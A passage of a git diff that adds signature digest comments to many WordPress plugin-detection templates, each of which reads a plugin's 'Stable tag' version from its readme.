newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..e3c9ff6588 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f4515456cc2b3bd1f9e3e31f0bbf6e0932a55a996b0469835525811b2e28868d02202fd82b2d246296d4d269bcbccd6449dd767e4423106b94c959ddeb58bc79216d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index ce5dc03713..aa88a72703 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022007482590a90683436db632b7f93681b375f5f69a6d90a23ad1b46c4c692f3a910221008190b48ed0fa639edcc307bb6d34aac539ab55ba66413ae9c235c32fed6ec719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..750bd926ed 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220229a868ed4942b1c9082322a474436f806eaafa24ede9a792016b265f1549314022100a30c486c62f74396896fd2426c7e1fcfaad1a1b323ee5daef3c80fde89bf50cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..a350f9d22a 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022069207d8d8316010ae671241dbac7cbcb91bab8c6fbe88513974d0f8bf4bb51840220455e14d8af7e1330b6b8e5d1968d79191a29605a86cbf5e426c83222a70b8155:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..b0b164fc40 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402204f439ec88da74bc30587b4e460471c4884fa4cadab3494034e257e48f8af0bc902207c7461dd65c5ad836af9834bf30b8a96c099763899a17527b9b0d05990592078:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..aaceda9d8b 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100937fbc1cb34b138d6b3a7f48c528f4647a9f36a5a124e79e5c373af19c6cecff022100af53933a8d3db6ec16bfc4a421a879b0b3965ea666e9cefc0e2f8642858e620d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 45260ccfba..066fce2770 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204d18f9601eb43396c54640c7c9713f7bdf029a064b3c502179e9c27f08f492a70221008aa88c290d37f2eae334e594973d5902ed0088c7baeac6a16a1e62dcc2027140:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..d590206c0c 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502207b2f7571568ec01ef57431c081a47c95f0724b6672a6ab8cdcc73fc9ccadb6ff022100eae9c0a744903511ec24c22ac6f1e0c3bc87181311afcbfcc2f0d3755d49725f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..935559ea73 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f403e15f9e408fbab407b87397d48496bc4988dd2880b7a582b7ac18c39c5c000221008d4bf064b2359dc48bbd27c49e202219898fd9b5005e154e9c5c359a8c39fa07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 64cfced6cf..2505bcae62 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b2710584317b9aef441942ffedf7b321ce7af3587bcfee67cfe03e6666db37cc022055e7f1c5bdbb58a1dca8375009ead055001434df5d118d38523df0d0b8ab295c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..435073839d 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402203ad32e9d39f49803c4a82340a6f075b7b314d317e7e763583d14f0c1ddcfc9f202207dcdc9ab035a3f502331c5e0d5771ee3753e1ace44a2aec79064345024dc2755:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..166e5cf239 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b9a10ff52e9b67c3398c89df449c9d1dd1c269c3daf5e665f25d70a99e0dbce10220164aa552cbac20c10e6e00fcdc2b4d7131e051eaafecc2a58e404a10da0e7fa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..daa26db4f5 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100c6dc4a60eb361b59e53c9f6f38904b7f1eca3c1cfd9ef3813bb549674a17e4610220236ea0d9792ded9faccea7ffcbd2f3019d813dadfebab6ba826e95638f0da97c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..6ff3140e8b 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402205cab80eb3abc748306b8261674ad9e17e6635392ad579cb7d9e578176a1021f102203bd1eb57b2de60dbd26cc27d5519952c24794c05938c9ed35cc3a225bc257896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..f02a9a8208 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100fcbe8f28fc152fe6ab21b7b76d998dea796c341df75711348d5651ffbf43697f022079887bc457c00b9fff80fadc62914aebd8a94e546a9385d69f897bd1a0bfa030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..feb48cddb9 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f9c0091947b22dbb216ad4cb86c8bc5d8fe89a47224488cac760482355189ed10221008c43ed52a88e89d9468fb4b9fc9d2d39daa12eeadb791f49954acf040e7f9272:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..f4d9f2d870 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d4cb4b79dcbd39c44a0c2d859e5c455d26eb8e6028784c6ab6938ce747c6df50022100981902b11c7dc0605a0579f822f7352d628348a94d3b0db14ce1ec97988ae197:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..db300ee39f 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008b5fa6f5bc8f474e8dbf7ac5fb880d80db6e899b6af696922f138037b2d4073f0221008165d6a1669bc66a72525e7b8fab102d4bd5d2e0436da938a6adb350277ff090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..e7265119c4 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d1dbde1a11fa08bd4e791bc69b8721891cda4bb6491db8f8a3d0322c607bdf1402202d0066b860acfd2b47d86040b5b9a30d721cb4d3e6dc1b97b095ac42dec0e044:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 4a68323ae1..e8065e572c 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022055f780206e2b82423ed5c3a99a1d626599d7deef7a66aa9f980f6e47361e85cd02202b33d201a7aaf3a1d846fdfe786fa94815017c112cc205e5e0e8c30a6c4d6e86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..35ddd7c2af 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022071bbe81a3860491b906978fbc08c36e3eef950bcce3d444da7056f1b959d74aa022100904ffc88c9f3163c6b56ea2b906c93b85792f0159678cdbb56197ad51f44ab2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..38895faf15 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100ae545a5c879d30e2d00e333cc2f27c184adb812d3bf96ba2bd2166a1c84b2f99022064e2ea988420c2d4e61fb754ffe8871fdc2b75f09e757f43c9c488066a78d271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..272c0d2556 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022010bf0d4929d48c9a462c2f74d8c923e3f10c3e1fe83e8ac55a035b9edeeafffb02205f66007582ff4107db7901b96ed7a8449e074e80a9da80f6a721f4df6482225d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..f30a733f5b 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204ed8469a5d6bec57b34e11c3ccb34eafc9a5393c8048f75b968fb9159a6216f502210099d5394fc8da29592c0959faf74f19b4b1320596d37eac7c61afd567041ea803:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..b7832aa92b 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201965e1b179218c41a3283afa3f5dcd321e5e183c08fb60c1a52c0dbce031697c02207bd5d691d863246356cac1cef0468b58ab90908f3c992df9f76589114d62b1f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..105aa93b65 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502206ff32ebbacd9b38de0a0cc443e67ad3fe1e52b5b56361c3202711d127682344f022100b87230487c602b2c4c26a24cf7e673274803b5652667d7bf056f31f82c1e866b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..7a313d7bf6 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220304faee56d62f11ca1adf195eca524b79f957e47cf05bad567e85ade12877c500220749fcb21e33762ff4c0ea61c099946276a2addcc3d8877344bf5403ede1d3239:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..2fabd0657a 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022032340b4af5b7a668c3dcd4d31dc6a074e4b515858c006e641ec980e9492d80e6022021f6472d407c54bac9183a60440df0a4e57c24c12069298ad18de1d45f0e6263:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..0c8bdc23fa 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a2ed70d28e7bda6aa86d16af9129b0096ccfe827c3893b5eca23d07ed387ad41022100c363ca7159d7fc2ff72ed1c4e4574c4cb0954b2a6991f22e2019d6d5233ca580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..5534c2dcc4 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b26fe11c93b5c059eb7157a83187b23596bd0fadb9f3a0ac1bd2f9eba95494a6022100e7edcb718462f1d33ec3ce885e76ee4348699620fc42d0f80fd81ff863d87bf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..a2e0e41bc7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a336ca6a537ae59d352d5dfef838e7059768fe2cbc7ad8fe1e9ba46508aa414b022100fe33b5c00c59cf3fe881217b2540fcc47be826bcdce4357c2154f3ffda87e40d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..9f02949773 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c9d3d7ebb7797272f42ac18227c2f707cf17f0dad6cfa9e9dfb892f1efcf282e022100a33bafd155d98b05a417a1e38149df6e0dce184e674adca1264c64bcc11d1f1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..a45ac54987 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402200c0516786b653972a1cb3d71e4cab5c46b8d1d195fd9439aa58d956b8ff4dfd7022049a820be4bb75bec4b4f5595208fa2cae952bb13591a38745aa9ae78d1e5a5ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..437cdd55d6 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402203812292a685a3c8f68e17c2e6f1189b4af191cda63b85cf5ff6151c1a1a61a310220291cb8a458ec66bb2235f8db67ffde166f7afa2c1328340436770351be4bdb3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..598f28228e 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022077b784a30e24f3d13b63de72431398bf73a4e748d8a1b6414c0c83ae844ae13f022034b56a785fa47552c6caaabc2662d000f2a23623094e207eb781731bbf0d30e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..b00d1e2ff9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206c4848b67e595891348a07b2b3447e5786958ffd88abbd5517d5e854ddbeb27002206eb4d1d7d48a892089d5b8173607be5f1c9be701cd462f2216ce3d75d726fcdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index ed3161d27c..7fd1a63a06 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502201c34add51e2268dd4899f7ee6507f2584e3d7c80672c2d2afd7bd50daf908a41022100d0ce5954b1b40ba7864867c848b23ee92ace0a0f74d1a16833655b08acc1ef1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..9c4970390b 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100839eeae6dbf1baa7beb95ef721c87c3ddfdd333978191d0ab30563ca05a8d78302200defbaa59dd907d9ab1a6a3c5045ea7179c7d499a49c5ddc8500031c9879fc23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..ee8e9f507f 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e4f61fa4e93dd2490bdfddda20256c1c027e16eac9d5d5b5164571aec9c68c65022006c1825f6950add564a7b1e65d5dc3e89d64b0ede3645038f227d074f9236e7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..2ab4a841fd 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502201ecaa23adc4f2050bff01a4d6e62ab7d5d32812c0b6cec8043c36846ea1c6b07022100b6cdf4f8e8981d7c6bef8cfd557337fbfe8426fbe93ec3e9d874c1d795a7832d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..dc763c9569 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b16fb19020e20d434826ebf98b36d699bd9d2b09bf06764dbf60f991248c00a402202e6709f24b56f89e8a20bfeb8babd46e1fd54c4ef6045d49d4c13b57c18bde59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..27e70822e7 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022013097b8dd40ab884c1c55535188b5cd1a8ae4f4e4a65ce17397394b17e94cb2f02207b2197f09f32fa31c79ef51b3344260e801ef49b167cbed255774682321a3f13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 540d535ecc..6ff8a07e79 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022018894e4016048ea2f7b0588ffb157eed9b27723f37a160ce989186302a19322d022029495a00ebefb972fb2f2395207cf70fda9d4a505ec858e8f2139660009518ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..39cac8d775 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b5e6d8605481757256181e250d3bb1dcf69e296554171a55e21903fa2649a6a4022100bb05a96b127c53c7fd0ff147b0dbd26dfdbb34b10c5cd6eaa593c116bb31b11e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index d69709b8f9..955a11a8b5 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e0fa77495d325081e6ab9d5fa6d3f776f68e950149cc45d5ccc62ceb35ae491102206c62237c7dd27a631d4787be73074909de0885d45379ccf2067ffd7fc47d34e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..c3242f0c7d 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c3068dfe7152d1ebe0a31c3ef72c615471353cec7da93f6b8726aac015d1cbae02210089b38b1ef1995f5739c83183e1d4c591c85b304aa24dcc83b4a950fdbe22392d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..f45f9d3fb2 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008f113c3d3c4cd6b8714fe2bb5093ab52f5271fc96d4e890f57775406cc5e6136022100c8327b90b3dd0861f91bad78edbe041ddf20da3b3adffa48c086e41bb7ebb623:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml 